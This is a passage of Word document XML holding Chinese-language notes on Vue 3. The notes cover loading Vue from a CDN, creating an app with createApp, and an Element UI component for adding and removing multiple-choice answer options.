      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6427181B" w14:textId="0BBF3D1B" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以借助</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE78DF7" w14:textId="5D75B2B1" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F453F">
        <w:t>&lt;script src="https://unpkg.com/vue@3/dist/vue.global.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF83E9E" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4988849F" w14:textId="0974BA17" w:rsidR="003F453F" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="715" w:name="_Toc159780145"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建应用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="715"/>
    </w:p>
    <w:p w14:paraId="359DA9AB" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932917C" w14:textId="7C82DD29" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用都是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> createApp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用实例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE5172C" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D69FDDC" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { createApp } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463CC09B" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B5D26D" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const app = createApp({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11566A74" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  /* </w:t>
      </w:r>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>根组件选项</w:t>
      </w:r>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455F4EF" w14:textId="3B3EA93A" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68641E29" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A83F86C" w14:textId="50C0480D" w:rsidR="003F453F" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8FD80" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD45786" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果你使用的是单文件组件，我们可以直接从另一个文件中导入根组件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1C530" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { createApp } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67269275" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>从一个单文件组件中导入根组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD9268" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import App from './App.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62767BF1" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRPr="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB5146B" w14:textId="767DB66C" w:rsidR="003F453F" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00926A4A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const app = createApp(App)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2027E4" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360FBFF0" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD64DF5" w14:textId="4F441596" w:rsidR="00615D6B" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好代码暂存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479B9B9" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD6C2A8" w14:textId="751BB013" w:rsidR="00615D6B" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动添加字段的选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C5C7F" w14:textId="03DBC9BF" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D761E8" wp14:editId="1F2BA4F2">
            <wp:extent cx="5274310" cy="4039870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1150227600"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27600" name="图片 1" descr="表格&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId211"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4039870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F5C3A" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7721FCD3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED3019" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-radio-group v-model="form.correctAnswer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B1C41" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div v-for="(item, index) in list" :key="index"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2557B61E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-radio :label="item.prefix"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F261D5" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;el-input v-model="item.content" style="width: 480px" size="mini"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0066A" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;template #prepend&gt;{{ item.prefix }}&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F22E8C6" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948CCB8" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;el-button class="el-icon-delete" size="mini" @click="handleRemove(item.prefix)"&gt;&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2920C" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-radio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709C316" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DC59D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-radio-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2C85E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-button type="text" @click="handleAddItem"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D77B1" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355AE53" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D64A4" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DAD427" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309974A" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDB16B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  data() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C5746" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCE695" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      form: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726A6E9" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        correctAnswer: "", // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确答案的选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE2F1B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C1FF50" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      list: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6C9E78" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        { prefix: "A", content: "" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6108258D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        { prefix: "B", content: "" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109588C3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC61F4" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1736A190" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0D593" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  methods: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E2E16" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    handleAddItem() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EAD8FC" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> index </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> A, B, C, D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9310F7" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      var alphabet = String.fromCharCode(65 + parseInt(this.list.length));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEB045" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      this.list.push({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD070E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        prefix: alphabet,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C48292" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        content: "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED1F6C0" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F40A2E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083745CE" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    handleRemove(key) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DA110" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D98C99E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      this.list = this.list.filter((item) =&gt; item.prefix !== key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B6DF7" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果删除的是正确答案，清空正确答案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F368614" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (this.form.correctAnswer === key) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C295F1" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        this.form.correctAnswer = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF0EF3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED564B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
